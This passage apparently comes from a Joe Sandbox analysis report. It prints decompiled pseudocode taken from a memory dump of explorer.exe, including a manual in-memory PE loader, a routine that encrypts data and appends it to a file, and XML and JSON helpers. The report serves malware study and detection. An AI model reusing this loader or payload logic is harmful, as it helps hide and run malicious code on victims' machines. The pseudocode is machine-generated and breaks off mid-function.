					if( *((char*)( *_t6)) != 0x3c) {
						L65:
						_t200 = _a4 + 8; // 0xcccccccc
						 *((intOrPtr*)(_a4 + 8)) =  *_t200 + 1;
						L66:
						continue;
					}
					_t8 = _a4 + 8; // 0xcccccccc
					if( *((char*)( *_t8 + 1)) == 0x3f) {
						goto L65;
					} else {
						_v8 = 0;
						_t12 = _a4 + 8; // 0xcccccccc
						_v20 =  *_t12 + 1;
						 *((intOrPtr*)(_a4 + 8)) = _v20;
						_v12 = _v20;
						while(1) {
							_t20 = _a4 + 8; // 0xcccccccc
							if( *((char*)( *_t20)) == 0x20) {
								break;
							}
							_t22 = _a4 + 8; // 0xcccccccc
							if( *((char*)( *_t22)) == 9) {
								break;
							}
							_t24 = _a4 + 8; // 0xcccccccc
							if( *((char*)( *_t24)) == 0xd) {
								break;
							}
							_t26 = _a4 + 8; // 0xcccccccc
							if( *((char*)( *_t26)) == 0xa) {
								break;
							}
							_t28 = _a4 + 8; // 0xcccccccc
							if( *((char*)( *_t28)) == 0x3e) {
								break;
							}
							_t30 = _a4 + 8; // 0xcccccccc
							if( *((char*)( *_t30)) == 0x2f) {
								break;
							}
							_v8 = _v8 + 1;
							_t34 = _a4 + 8; // 0xcccccccc
							 *((intOrPtr*)(_a4 + 8)) =  *_t34 + 1;
							_t267 = _a4;
							_t333 = _a4;
							_t39 = _t267 + 8; // 0xcccccccc
							_t40 = _t333 + 4; // 0xccc35de5
							if( *_t39 >=  *_t40) {
								return _t267;
							}
							_t42 = _a4 + 8; // 0xcccccccc
							if( *((char*)( *_t42)) == 0x3a) {
								_v8 = 0;
								_t45 = _a4 + 8; // 0xcccccccc
								_v24 =  *_t45 + 1;
								 *((intOrPtr*)(_a4 + 8)) = _v24;
								_v12 = _v24;
							}
						}
						if(_v8 <= 0) {
							_t161 = _a4 + 8; // 0xcccccccc
							if( *((char*)( *_t161)) != 0x2f) {
								L64:
								goto L66;
							}
							_v8 = 0;
							_t164 = _a4 + 8; // 0xcccccccc
							_v32 =  *_t164 + 1;
							 *((intOrPtr*)(_a4 + 8)) = _v32;
							_v12 = _v32;
							_t283 = _a4;
							_t347 = _a4;
							_t173 = _t283 + 8; // 0xcccccccc
							_t214 =  *_t173;
							_t174 = _t347 + 4; // 0xccc35de5
							if(_t214 <  *_t174) {
								while(1) {
									_t176 = _a4 + 8; // 0xcccccccc
									if( *((char*)( *_t176)) == 0x3e) {
										break;
									}
									_v8 = _v8 + 1;
									_t180 = _a4 + 8; // 0xcccccccc
									 *((intOrPtr*)(_a4 + 8)) =  *_t180 + 1;
									_t354 = _a4;
									_t222 = _a4;
									_t185 = _t354 + 8; // 0xcccccccc
									_t186 = _t222 + 4; // 0xccc35de5
									if( *_t185 <  *_t186) {
										continue;
									}
									return _t222;
								}
								if( *((intOrPtr*)(_a4 + 0x18)) != 0) {
									_t192 = _a4 + 0x10; // 0x55cccccc
									_t194 = _a4 + 0x18; // 0x8f0
									 *((intOrPtr*)( *_t194))( *_t192, _v12, _v8);
									_t400 = _t400 + 0xc;
								}
								_t196 = _a4 + 8; // 0xcccccccc
								 *((intOrPtr*)(_a4 + 8)) =  *_t196 + 1;
								goto L64;
							}
							return _t214;
						}
						if( *((intOrPtr*)(_a4 + 0x14)) != 0) {
							_t58 = _a4 + 0x10; // 0x55cccccc
							_t60 = _a4 + 0x14; // 0xec81ec8b
							 *((intOrPtr*)( *_t60))( *_t58, _v12, _v8);
							_t400 = _t400 + 0xc;
						}
						_t224 = E0150CDB0(_a4);
						_t400 = _t400 + 4;
						if(_t224 == 0) {
							_t63 = _a4 + 8; // 0xcccccccc
							if( *((char*)( *_t63)) == 0x2f) {
								L53:
								goto L64;
							}
							_v8 = 0;
							_t66 = _a4 + 8; // 0xcccccccc
							_v28 =  *_t66 + 1;
							 *((intOrPtr*)(_a4 + 8)) = _v28;
							_v16 = _v28;
							_t227 = _a4;
							_t296 = _a4;
							_t75 = _t227 + 8; // 0xcccccccc
							_t76 = _t296 + 4; // 0xccc35de5
							if( *_t75 <  *_t76) {
								while(1) {
									_t78 = _a4 + 8; // 0xcccccccc
									if( *((char*)( *_t78)) == 0x20) {
										goto L28;
									}
									L25:
									_t80 = _a4 + 8; // 0xcccccccc
									if( *((char*)( *_t80)) == 9) {
										goto L28;
									}
									_t82 = _a4 + 8; // 0xcccccccc
									if( *((char*)( *_t82)) == 0xd) {
										goto L28;
									}
									_t235 = _a4;
									_t84 = _t235 + 8; // 0xcccccccc
									if( *((char*)( *_t84)) != 0xa) {
										_push(9);
										_push("<![CDATA[");
										_t96 = _a4 + 8; // 0xcccccccc
										_push( *_t96);
										L015077DC();
										_t400 = _t400 + 0xc;
										if(_t235 != 0) {
											while(1) {
												_t137 = _a4 + 8; // 0xcccccccc
												if( *((char*)( *_t137)) == 0x3c) {
													break;
												}
												_v8 = _v8 + 1;
												_t141 = _a4 + 8; // 0xcccccccc
												 *((intOrPtr*)(_a4 + 8)) =  *_t141 + 1;
												_t145 = _a4 + 8; // 0xcccccccc
												_t244 = _a4;
												_t147 = _t244 + 4; // 0xccc35de5
												if( *_t145 + 1 <  *_t147) {
													continue;
												}
												return _t244;
											}
											if(_v8 > 0 &&  *((intOrPtr*)(_a4 + 0x1c)) != 0) {
												_t152 = _a4 + 8; // 0xcccccccc
												if( *((char*)( *_t152 + 1)) == 0x2f) {
													_t157 = _a4 + 0x10; // 0x55cccccc
													_t159 = _a4 + 0x1c; // 0x8966c033
													 *((intOrPtr*)( *_t159))( *_t157, _v16, _v8);
													_t400 = _t400 + 0xc;
												}
											}
											goto L53;
										}
										_t98 = _a4 + 8; // 0xcccccccc
										 *((intOrPtr*)(_a4 + 8)) =  *_t98 + 9;
										_t102 = _a4 + 8; // 0xcccccccc
										_v16 =  *_t102;
										_v8 = 0;
										while(1) {
											_push(3);
											_push("]]>");
											_t106 = _a4 + 8; // 0xcccccccc
											_t247 =  *_t106;
											_push(_t247);
											L015077DC();
											_t400 = _t400 + 0xc;
											if(_t247 == 0) {
												break;
											}
											_v8 = _v8 + 1;
											_t110 = _a4 + 8; // 0xcccccccc
											 *((intOrPtr*)(_a4 + 8)) =  *_t110 + 1;
											_t114 = _a4 + 8; // 0xcccccccc
											_t257 =  *_t114 + 3;
											_t116 = _a4 + 4; // 0xccc35de5
											if(_t257 <  *_t116) {
												continue;
											}
											return _t257;
										}
										if(_v8 > 0 &&  *((intOrPtr*)(_a4 + 0x1c)) != 0) {
											_t123 = _a4 + 0x10; // 0x55cccccc
											_t125 = _a4 + 0x1c; // 0x8966c033
											 *((intOrPtr*)( *_t125))( *_t123, _v16, _v8);
											_t400 = _t400 + 0xc;
										}
										while(1) {
											_t127 = _a4 + 8; // 0xcccccccc
											if( *((char*)( *_t127)) == 0x3c) {
												break;
											}
											_t129 = _a4 + 8; // 0xcccccccc
											 *((intOrPtr*)(_a4 + 8)) =  *_t129 + 1;
											_t250 = _a4;
											_t317 = _a4;
											_t134 = _t250 + 8; // 0xcccccccc
											_t135 = _t317 + 4; // 0xccc35de5
											if( *_t134 <  *_t135) {
												continue;
											}
											return _t250;
										}
										goto L53;
									}
									L28:
									_v8 = _v8 + 1;
									_t88 = _a4 + 8; // 0xcccccccc
									 *((intOrPtr*)(_a4 + 8)) =  *_t88 + 1;
									_t299 = _a4;
									_t364 = _a4;
									_t93 = _t299 + 8; // 0xcccccccc
									_t232 =  *_t93;
									_t94 = _t364 + 4; // 0xccc35de5
									if(_t232 <  *_t94) {
										_t78 = _a4 + 8; // 0xcccccccc
										if( *((char*)( *_t78)) == 0x20) {
											goto L28;
										}
										goto L25;
									}
									return _t232;
								}
							}
							return _t227;
						}
						return _t224;
					}
				}
				return _t203;
			}

0x0150c976
0x0150c976
0x0150c979
0x0150c985
0x00000000
0x00000000
0x0150c98e
0x0150c997
0x0150cd92
0x0150cd95
0x0150cd9e
0x0150cda1
0x00000000
0x0150cda1
0x0150c9a0
0x0150c9aa
0x00000000
0x0150c9b0
0x0150c9b0
0x0150c9ba
0x0150c9c0
0x0150c9c9
0x0150c9cf
0x0150c9d2
0x0150c9d5
0x0150c9de
0x00000000
0x00000000
0x0150c9e7
0x0150c9f0
0x00000000
0x00000000
0x0150c9f9
0x0150ca02
0x00000000
0x00000000
0x0150ca0b
0x0150ca14
0x00000000
0x00000000
0x0150ca19
0x0150ca22
0x00000000
0x00000000
0x0150ca27
0x0150ca30
0x00000000
0x00000000
0x0150ca38
0x0150ca3e
0x0150ca47
0x0150ca4a
0x0150ca4d
0x0150ca50
0x0150ca53
0x0150ca56
0x00000000
0x00000000
0x0150ca60
0x0150ca69
0x0150ca6b
0x0150ca75
0x0150ca7b
0x0150ca84
0x0150ca8a
0x0150ca8a
0x0150ca8d
0x0150ca96
0x0150cce2
0x0150cceb
0x0150cd90
0x00000000
0x0150cd90
0x0150ccf1
0x0150ccfb
0x0150cd01
0x0150cd0a
0x0150cd10
0x0150cd13
0x0150cd16
0x0150cd19
0x0150cd19
0x0150cd1c
0x0150cd1f
0x0150cd26
0x0150cd29
0x0150cd32
0x00000000
0x00000000
0x0150cd3a
0x0150cd40
0x0150cd49
0x0150cd4c
0x0150cd4f
0x0150cd52
0x0150cd55
0x0150cd58
0x00000000
0x0150cd5c
0x00000000
0x0150cd58
0x0150cd65
0x0150cd72
0x0150cd79
0x0150cd7c
0x0150cd7e
0x0150cd7e
0x0150cd84
0x0150cd8d
0x00000000
0x0150cd8d
0x00000000
0x0150cd1f
0x0150caa3
0x0150cab0
0x0150cab7
0x0150caba
0x0150cabc
0x0150cabc
0x0150cac3
0x0150cac8
0x0150cacd
0x0150cad7
0x0150cae0
0x0150ccda
0x00000000
0x0150ccda
0x0150cae6
0x0150caf0
0x0150caf6
0x0150caff
0x0150cb05
0x0150cb08
0x0150cb0b
0x0150cb0e
0x0150cb11
0x0150cb14
0x0150cb1b
0x0150cb1e
0x0150cb27
0x00000000
0x00000000
0x0150cb29
0x0150cb2c
0x0150cb35
0x00000000
0x00000000
0x0150cb3a
0x0150cb43
0x00000000
0x00000000
0x0150cb45
0x0150cb48
0x0150cb51
0x0150cb80
0x0150cb82
0x0150cb8a
0x0150cb8d
0x0150cb8e
0x0150cb93
0x0150cb98
0x0150cc64
0x0150cc67
0x0150cc70
0x00000000
0x00000000
0x0150cc78
0x0150cc7e
0x0150cc87
0x0150cc8d
0x0150cc93
0x0150cc96
0x0150cc99
0x00000000
0x0150cca0
0x00000000
0x0150cc99
0x0150cca6
0x0150ccb4
0x0150ccbe
0x0150cccb
0x0150ccd2
0x0150ccd5
0x0150ccd7
0x0150ccd7
0x0150ccbe
0x00000000
0x0150cca6
0x0150cba1
0x0150cbaa
0x0150cbb0
0x0150cbb3
0x0150cbb6
0x0150cbbd
0x0150cbbd
0x0150cbbf
0x0150cbc7
0x0150cbc7
0x0150cbca
0x0150cbcb
0x0150cbd0
0x0150cbd5
0x00000000
0x00000000
0x0150cbdd
0x0150cbe3
0x0150cbec
0x0150cbf2
0x0150cbf5
0x0150cbfb
0x0150cbfe
0x00000000
0x0150cc05
0x00000000
0x0150cbfe
0x0150cc0b
0x0150cc21
0x0150cc28
0x0150cc2b
0x0150cc2d
0x0150cc2d
0x0150cc30
0x0150cc33
0x0150cc3c
0x00000000
0x00000000
0x0150cc41
0x0150cc4a
0x0150cc4d
0x0150cc50
0x0150cc53
0x0150cc56
0x0150cc59
0x00000000
0x0150cc60
0x00000000
0x0150cc59
0x00000000
0x0150cc62
0x0150cb53
0x0150cb59
0x0150cb5f
0x0150cb68
0x0150cb6b
0x0150cb6e
0x0150cb71
0x0150cb71
0x0150cb74
0x0150cb77
0x0150cb1e
0x0150cb27
0x00000000
0x00000000
0x00000000
0x0150cb27
0x00000000
0x0150cb77
0x0150cb1b
0x00000000
0x0150cb14
0x00000000
0x0150cacd
0x0150c9aa
0x0150cda9

Strings

<![CDATA[, xrefs: 0150CB82
]]>, xrefs: 0150CBBF

Memory Dump Source

Source File: 0000000C.00000002.753280657.01500000.00000040.00000001.sdmp, Offset: 01500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1500000_explorer.jbxd

Yara matches

Similarity

API ID:
String ID: <![CDATA[$]]>
API String ID: 0-2154144501
Opcode ID: de197c8ada98ca7388db2b1cac36110f7c5209a26ff2f07382bbf710ebfea946
Instruction ID: 8bc660438d9e192d3087b3d070cf7deec12d15159f5907c4246f1802f4ca1bd2
Opcode Fuzzy Hash: de197c8ada98ca7388db2b1cac36110f7c5209a26ff2f07382bbf710ebfea946
Instruction Fuzzy Hash: 0AF1BA75604248EFC705CF48C590A6DBBB2FF89354B28C689E9494F355D331EE81DB84

Uniqueness

Uniqueness Score: 100.00%

Function 0151E200, Relevance: 6.2, APIs: 4, Instructions: 208
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 54%

			E0151E200(intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				signed short* _v24;
				intOrPtr _v28;
				signed short* _v32;
				intOrPtr _v36;
				unsigned int _v40;
				unsigned int _v44;
				intOrPtr* _v48;
				signed short _v52;
				signed int _v53;
				intOrPtr _v60;
				signed int _v64;
				signed int* _v68;
				struct HINSTANCE__* _v72;
				intOrPtr* _v76;
				intOrPtr _v80;
				_Unknown_base(*)()* _v84;
				intOrPtr _t172;

				_v8 =  *((intOrPtr*)(_a4 + 0x3c)) + _a4;
				_v16 = _v8;
				_t172 = _a4 -  *((intOrPtr*)(_v16 + 0x34));
				_v12 = _t172;
				if(_t172 == 0) {
					L13:
					while(0 != 0) {
					}
					if( *((intOrPtr*)(_v16 + 0x80)) == 0) {
						L35:
						_v20 =  *((intOrPtr*)(_v16 + 0x28)) + _a4;
						while(0 != 0) {
						}
						if(_a12 != 0) {
							 *_a12 = _v20;
						}
						 *((intOrPtr*)(_v16 + 0x34)) = _a4;
						return _v20(_a4, 1, _a8);
					}
					_v64 = 0x80000000;
					_v76 = _a4 +  *((intOrPtr*)(_v16 + 0x80));
					while( *((intOrPtr*)(_v76 + 0xc)) != 0) {
						_v72 = GetModuleHandleA( *((intOrPtr*)(_v76 + 0xc)) + _a4);
						if(_v72 == 0) {
							_v72 = LoadLibraryA( *((intOrPtr*)(_v76 + 0xc)) + _a4);
						}
						if(_v72 != 0) {
							if( *_v76 == 0) {
								_v68 =  *((intOrPtr*)(_v76 + 0x10)) + _a4;
							} else {
								_v68 =  *_v76 + _a4;
							}
							_v60 = 0;
							while( *_v68 != 0) {
								if(( *_v68 & _v64) == 0) {
									_v80 =  *_v68 + _a4;
									_v84 = GetProcAddress(_v72, _v80 + 2);
								} else {
									_v84 = GetProcAddress(_v72,  *_v68 & 0x0000ffff);
								}
								if( *((intOrPtr*)(_v76 + 0x10)) == 0) {
									 *_v68 = _v84;
								} else {
									 *( *((intOrPtr*)(_v76 + 0x10)) + _a4 + _v60) = _v84;
								}
								_v68 =  &(_v68[1]);
								_v60 = _v60 + 4;
							}
							_v76 = _v76 + 0x14;
							continue;
						} else {
							return 0xfffffffd;
						}
					}
					goto L35;
				}
				_v24 = _a4 +  *((intOrPtr*)(_v16 + 0xa0));
				_v28 =  *((intOrPtr*)(_v16 + 0xa4));
				while(0 != 0) {
				}
				while(_v28 > 0) {
					_v40 = _v24[2];
					_v28 = _v28 - _v40;
					_v40 = _v40 - 8;
					_v40 = _v40 >> 1;
					_v32 =  &(_v24[4]);
					_v36 = _a4 +  *_v24;
					_v44 = _v40;
					while(1) {
						_v44 = _v44 - 1;
						if(_v44 == 0) {
							break;
						}
						_v53 = ( *_v32 & 0x0000ffff) >> 0xc;
						_v52 =  *_v32 & 0xfff;
						_v48 = (_v52 & 0x0000ffff) + _v36;
						if((_v53 & 0x000000ff) != 3) {
							if((_v53 & 0x000000ff) == 0xa) {
								 *_v48 =  *_v48 + _v12;
							}
						} else {
							 *_v48 =  *_v48 + _v12;
						}
						_v32 =  &(_v32[1]);
					}
					_v24 = _v32;
				}
				goto L13;
			}

0x0151e20f
0x0151e215
0x0151e21e
0x0151e221
0x0151e224
0x00000000
0x0151e30b
0x0151e30f
0x0151e31b
0x0151e43d
0x0151e446
0x0151e449
0x0151e44d
0x0151e453
0x0151e45b
0x0151e45b
0x0151e463
0x00000000
0x0151e470
0x0151e321
0x0151e334
0x0151e337
0x0151e354
0x0151e35b
0x0151e36d
0x0151e36d
0x0151e374
0x0151e386
0x0151e39e
0x0151e388
0x0151e390
0x0151e390
0x0151e3a1
0x0151e3a8
0x0151e3b8
0x0151e3dc
0x0151e3f0
0x0151e3ba
0x0151e3cf
0x0151e3cf
0x0151e3fa
0x0151e416
0x0151e3fc
0x0151e40b
0x0151e40b
0x0151e41e
0x0151e427
0x0151e427
0x0151e435
0x00000000
0x0151e376
0x00000000
0x0151e376
0x0151e374
0x00000000
0x0151e337
0x0151e236
0x0151e242
0x0151e245
0x0151e249
0x0151e24b
0x0151e25b
0x0151e264
0x0151e26d
0x0151e275
0x0151e27e
0x0151e289
0x0151e28f
0x0151e292
0x0151e29b
0x0151e2a0
0x00000000
0x00000000
0x0151e2ab
0x0151e2b9
0x0151e2c4
0x0151e2ce
0x0151e2e6
0x0151e2f3
0x0151e2f3
0x0151e2d0
0x0151e2db
0x0151e2db
0x0151e2fb
0x0151e2fb
0x0151e303
0x0151e303
0x00000000

APIs

GetModuleHandleA.KERNEL32(?), ref: 0151E34E
LoadLibraryA.KERNEL32(?), ref: 0151E367
GetProcAddress.KERNEL32(00000000,?), ref: 0151E3C9
GetProcAddress.KERNEL32(00000000,?), ref: 0151E3EA

Memory Dump Source

Source File: 0000000C.00000002.753280657.01500000.00000040.00000001.sdmp, Offset: 01500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1500000_explorer.jbxd

Yara matches

Similarity

API ID: AddressProc$HandleLibraryLoadModule
String ID:
API String ID: 384173800-0
Opcode ID: 33e2f90d7a9360420469aba3210826dd856ce9f8c75d7e48054c2c3cddd52fa7
Instruction ID: fe38fd44cb48bcbd164059bbdc52e4b9cac6d248d9308d3707ee79fede96346c
Opcode Fuzzy Hash: 33e2f90d7a9360420469aba3210826dd856ce9f8c75d7e48054c2c3cddd52fa7
Instruction Fuzzy Hash: 7DA1B774E00209DFDB16CF98C495AEDBBB2FF89314F248559E915AB349C734A982CF90

Uniqueness

Uniqueness Score: 0.99%

Function 015193D0, Relevance: 6.2, APIs: 4, Instructions: 190
fileCOMMON

Download Yara Rule

C-Code - Quality: 16%

			E015193D0(intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, WCHAR* _a16) {
				long _v8;
				void* _v12;
				char _v276;
				void* _v280;
				long _t51;
				void* _t64;
				void* _t129;
				void* _t130;
				void* _t131;
				void* _t134;
				void* _t135;

				_v8 = 0;
				while(0 != 0) {
				}
				if( *_a4 != 0) {
					while(0 != 0) {
					}
					if( *((intOrPtr*)( *_a4 + 8)) != 0) {
						if(_a16 != 0) {
							_t51 = E01513960(_a4,  *((intOrPtr*)( *_a4 + 8)) + 4);
							_t130 = _t129 + 4;
							_v8 = _t51;
							if(_v8 == 0) {
								while(0 != 0) {
								}
								return _t51;
							}
							L19:
							while(0 != 0) {
							}
							 *_v8 =  *((intOrPtr*)( *_a4 + 8));
							E01513AC0(_v8 + 4, _v8 + 4,  *((intOrPtr*)( *_a4 + 4)),  *((intOrPtr*)( *_a4 + 8)));
							_t131 = _t130 + 0xc;
							while(0 != 0) {
							}
							E015202A0(_a8, 0x20,  &_v276);
							E01520390(_v8, 4,  &_v276);
							E01520390(_v8 + 4,  *((intOrPtr*)( *_a4 + 8)),  &_v276);
							_t134 = _t131 + 0x24;
							while(0 != 0) {
							}
							while(0 != 0) {
							}
							_t64 = E01518810(0, _a12, 0x1388);
							_t135 = _t134 + 8;
							_v12 = _t64;
							if(_v12 != 0) {
								_v280 = CreateFileW(_a16, 0x40000000, 0, 0, 4, 0, 0);
								if(_v280 != 0) {
									if(SetFilePointer(_v280, 0, 0, 2) < 0) {
										while(0 != 0) {
										}
									}
									E01518E50(_v280, _v8,  *((intOrPtr*)( *_a4 + 8)) + 4);
									_t135 = _t135 + 0xc;
									CloseHandle(_v280);
								} else {
									while(0 != 0) {
									}
								}
								E015188D0(_v12);
								_t135 = _t135 + 4;
								CloseHandle(_v12);
								while(0 != 0) {
								}
							} else {
								while(0 != 0) {
								}
							}
						} else {
							while(0 != 0) {
							}
						}
					} else {
					}
				} else {
					while(0 != 0) {
					}
				}
				E01513990( &_v8,  *((intOrPtr*)( *_a4 + 8)) + 4);
				E01513990( *_a4 + 4,  *((intOrPtr*)( *_a4 + 8)));
				E01513990(_a4, 0x10);
				while(0 != 0) {
				}
				return 0;
			}

0x015193d9
0x015193e0
0x015193e4
0x015193ec
0x015193f9
0x015193fd
0x01519408
0x01519413
0x0151942c
0x01519431
0x01519434
0x0151943b
0x0151943d
0x01519441
0x00000000
0x0151943d
0x00000000
0x01519448
0x0151944c
0x01519459
0x01519474
0x01519479
0x0151947c
0x01519480
0x0151948f
0x015194a4
0x015194c3
0x015194c8
0x015194cb
0x015194cf
0x015194d1
0x015194d5
0x015194e0
0x015194e5
0x015194e8
0x015194ef
0x01519515
0x01519522
0x01519541
0x01519543
0x01519547
0x01519543
0x01519560
0x01519565
0x0151956f
0x01519524
0x01519524
0x01519528
0x0151952a
0x01519579
0x0151957e
0x01519585
0x0151958b
0x0151958f
0x015194f1
0x015194f1
0x015194f5
0x015194f7
0x01519415
0x01519415
0x01519419
0x0151941b
0x00000000
0x0151940a
0x015193ee
0x015193ee
0x015193f2
0x015193f4
0x015195a1
0x015195bb
0x015195c9
0x015195d1
0x015195d5
0x015195da

APIs

CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000004,00000000,00000000), ref: 0151950F
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 01519539
CloseHandle.KERNEL32(00000000), ref: 0151956F
CloseHandle.KERNEL32(00000000), ref: 01519585

Memory Dump Source

Source File: 0000000C.00000002.753280657.01500000.00000040.00000001.sdmp, Offset: 01500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1500000_explorer.jbxd

Yara matches

Similarity

API ID: CloseFileHandle$CreatePointer
String ID:
API String ID: 3491693933-0
Opcode ID: e6344b0f07d8c53cf57fc1e002c24b3291550331a425c8446e141bcd045f580d
Instruction ID: f3a9552c7d480cd4dec37a64375cb332f37005a40b07dd80c8da6fc279d571db
Opcode Fuzzy Hash: e6344b0f07d8c53cf57fc1e002c24b3291550331a425c8446e141bcd045f580d
Instruction Fuzzy Hash: 9D61B975A00109DFFB15DF54D8A1BAE77B5BF8830CF148558E6069F389D670EA40CB91

Uniqueness

Uniqueness Score: 1.34%

Function 015231E0, Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 159
UNIQUE

Download Yara Rule

C-Code - Quality: 18%

			E015231E0(signed int __eax, intOrPtr _a4, intOrPtr* _a8, intOrPtr _a12, signed char _a16) {
				signed int _v8;
				intOrPtr _v12;
				char _v28;
				signed int _t33;
				signed int _t34;
				signed int _t37;
				char* _t41;
				signed int _t42;
				signed int _t49;
				intOrPtr* _t50;
				void* _t52;
				signed char _t58;
				void* _t60;
				signed int _t66;
				signed int _t70;
				void* _t73;
				void* _t74;

				_t49 = __eax;
				_t33 = _a8("\"", 1, _a12);
				_t74 = _t73 + 0xc;
				if(_t33 == 0) {
					_t70 = __eax;
					_t66 = __eax;
					_v12 = __eax + _a4;
					L3:
					while(1) {
						L3:
						if(_t66 >= _v12) {
							_t34 = _v8;
							goto L16;
						} else {
							while(1) {
								_t42 = E015246E0(_t70, _v12 - _t70,  &_v8);
								_t66 = _t42;
								_t74 = _t74 + 0xc;
								if(_t66 == 0) {
									break;
								}
								_t34 = _v8;
								if(_t34 == 0x5c || _t34 == 0x22 || _t34 < 0x20) {
									L16:
									if(_t70 == _t49) {
										_t50 = _a8;
										goto L20;
									} else {
										_t50 = _a8;
										_t42 =  *_t50(_t49, _t70 - _t49, _a12);
										_t74 = _t74 + 0xc;
										if(_t42 != 0) {
											break;
										} else {
											_t34 = _v8;
											L20:
											if(_t66 == _t70) {
												return  *_t50("\"", 1, _a12);
											} else {
												_t21 = _t34 - 8; // 0x78
												_t60 = _t21;
												_t52 = 2;
												if(_t60 > 0x54) {
													L31:
													if(_t34 >= 0x10000) {
														_t37 = _t34 - 0x10000;
														_v8 = _t37;
														_push(_t37 & 0x000003ff | 0x0000dc00);
														_push((_t37 & 0x000ffc00 | 0x03600000) >> 0xa);
														_push("\\u%04X\\u%04X");
														_push(0xd);
														_push( &_v28);
														L015290C0();
														_t74 = _t74 + 0x14;
														_t52 = 0xc;
													} else {
														_push(_t34);
														_push("\\u%04X");
														_push(0xd);
														_push( &_v28);
														L015290C0();
														_t74 = _t74 + 0x10;
														_t52 = 6;
													}
													_t41 =  &_v28;
												} else {
													_t22 = _t60 + 0x15233c0; // 0x418a1274
													switch( *((intOrPtr*)(( *_t22 & 0x000000ff) * 4 +  &M0152339C))) {
														case 0:
															__eax = "\\b";
															goto L35;
														case 1:
															__eax = "\\t";
															goto L35;
														case 2:
															__eax = "\\n";
															goto L35;
														case 3:
															__eax = "\\f";
															goto L35;
														case 4:
															__eax = "\\r";
															goto L35;
														case 5:
															__eax = "\\\"";
															goto L35;
														case 6:
															__eax = "\\/";
															goto L35;
														case 7:
															_t41 = "\\\\";
															goto L35;
														case 8:
															goto L31;
													}
												}
												L35:
												_t42 =  *_t50(_t41, _t52, _a12);
												_t74 = _t74 + 0xc;
												if(_t42 != 0) {
													break;
												} else {
													_t70 = _t66;
													_t49 = _t66;
													goto L3;
												}
											}
										}
									}
								} else {
									_t58 = _a16;
									if((_t58 & 0x00000400) == 0 || _t34 != 0x2f) {
										if((_t58 & 0x00000040) == 0 || _t34 <= 0x7f) {
											_t70 = _t66;
											if(_t66 < _v12) {
												continue;
											} else {
												goto L16;
											}
										} else {
											goto L16;
										}
									} else {
										goto L16;
									}
								}
								goto L39;
							}
							return _t42 | 0xffffffff;
						}
						goto L39;
					}
				} else {
					return _t33 | 0xffffffff;
				}
				L39:
			}

0x015231e7
0x015231f4
0x015231f7
0x015231fc
0x0152320e
0x01523210
0x01523212
0x00000000
0x01523215
0x01523215
0x01523218
0x01523272
0x00000000
0x01523220
0x01523220
0x0152322b
0x01523230
0x01523232
0x01523237
0x00000000
0x00000000
0x0152323d
0x01523243
0x01523275
0x01523277
0x01523298
0x00000000
0x01523279
0x01523283
0x01523286
0x01523288
0x0152328d
0x00000000
0x01523293
0x01523293
0x0152329b
0x0152329d
0x0152338f
0x015232a3
0x015232a3
0x015232a3
0x015232a6
0x015232ae
0x015232ff
0x01523304
0x01523321
0x01523328
0x0152333c
0x01523345
0x01523346
0x0152334e
0x01523350
0x01523351
0x01523356
0x01523359
0x01523306
0x01523306
0x01523307
0x0152330f
0x01523311
0x01523312
0x01523317
0x0152331a
0x0152331a
0x0152335e
0x015232b0
0x015232b0
0x015232b7
0x00000000
0x015232d2
0x00000000
0x00000000
0x015232f1
0x00000000
0x00000000
0x015232e3
0x00000000
0x00000000
0x015232dc
0x00000000
0x00000000
0x015232ea
0x00000000
0x00000000
0x015232c8
0x00000000
0x00000000
0x015232f8
0x00000000
0x00000000
0x015232be
0x00000000
0x00000000
0x00000000
0x00000000
0x015232b7
0x01523361
0x01523367
0x01523369
0x0152336e
0x00000000
0x01523370
0x01523370
0x01523372
0x00000000
0x01523372
0x0152336e
0x0152329d
0x0152328d
0x0152324f
0x0152324f
0x01523258
0x01523262
0x01523269
0x0152326e
0x00000000
0x01523270
0x00000000
0x01523270
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x01523258
0x00000000
0x01523243
0x01523399
0x01523399
0x00000000
0x01523218
0x015231fe
0x01523205
0x01523205
0x00000000

Strings

\u%04X, xrefs: 01523307
\u%04X\u%04X, xrefs: 01523346

Memory Dump Source

Source File: 0000000C.00000002.753280657.01500000.00000040.00000001.sdmp, Offset: 01500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1500000_explorer.jbxd

Yara matches

Similarity

API ID:
String ID: \u%04X$\u%04X\u%04X
API String ID: 0-1155366105
Opcode ID: ec5cb70cd2b84924f01e92b0412bc12d1083e266eb4f2aa47b30bffcfed8d278
Instruction ID: c3821ee2841a138b6c99d8f7ad11e59922335994ebd7c051317ffbcd5b62be44
Opcode Fuzzy Hash: ec5cb70cd2b84924f01e92b0412bc12d1083e266eb4f2aa47b30bffcfed8d278
Instruction Fuzzy Hash: 0441E433A00225ABDB50CA9D9881BBE77E9FB9F310F140925FE05DF3C1DA399A41C691

Uniqueness

Uniqueness Score: 100.00%

Function 01519BA0, Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 145
UNIQUE

Download Yara Rule

C-Code - Quality: 25%

			E01519BA0(void* __ecx, void* __fp0, intOrPtr _a4) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				intOrPtr _v28;
				char _v292;
				char _v294;
				char _v295;
				char _v296;
				char _v308;
				void* _v312;
				char _v336;
				char _t48;
				char _t50;
				intOrPtr _t55;
				intOrPtr _t63;
				void* _t65;
				void* _t96;
				void* _t97;
				void* _t98;
				void* _t100;
				void* _t105;
				void* _t106;

				_v8 = 0;
				_v16 = 0;
				_v20 = 0;
				_v12 = 0;
				_v24 = 0;
				_t48 = E015199A0(__ecx, __fp0,  &_v16);
				_t97 = _t96 + 4;
				_v20 = _t48;
				if(_v20 != 0) {
					while(0 != 0) {
					}
					_t50 = E01521330(_v16, _v20, _v16,  &_v12);
					_t98 = _t97 + 0xc;
					_v24 = _t50;
